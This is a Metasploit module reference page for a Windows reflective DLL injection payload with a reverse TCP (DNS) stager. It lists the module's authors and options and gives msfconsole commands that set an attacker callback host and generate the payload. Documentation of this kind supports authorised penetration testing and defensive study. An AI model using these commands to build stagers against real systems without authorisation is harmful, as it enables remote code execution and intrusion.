Reflective DLL Injection, Reverse TCP Stager (DNS) | Metasploit Exploit Database (DB)

Home > Exploit DB

Reflective DLL Injection, Reverse TCP Stager (DNS)

Connect back to the attacker, Inject a DLL via a reflective loader

Search Other Modules

Rank

Normal

Authors

sf < stephen_fewer [at] harmonysecurity.com >
hdm < hdm [at] metasploit.com >
skape < mmiller [at] hick.org >

Vulnerability References

https://github.com/stephenfewer/ReflectiveDLLInjection

Similar Modules

Usage Information

$ msfconsole

                ##                          ###           ##    ##
##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/windows/dllinject/reverse_tcp_dns
msf payload(reverse_tcp_dns) > set DLL [PATH]
msf payload(reverse_tcp_dns) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp_dns) > generate

Module Options

DLL	The local path to the Reflective DLL to upload
EXITFUNC	Exit technique: none, seh, process, thread (default: process)
LHOST	The DNS hostname to connect back to
LPORT	The listen port (default: 4444)
ReverseConnectRetries	The number of connection attempts to try before exiting the process
ReverseListenerBindAddress	The specific IP address to bind to on the local system
ReverseListenerComm	The specific communication channel to use for this listener
VERBOSE	Enable detailed status messages
WORKSPACE	Specify the workspace for this module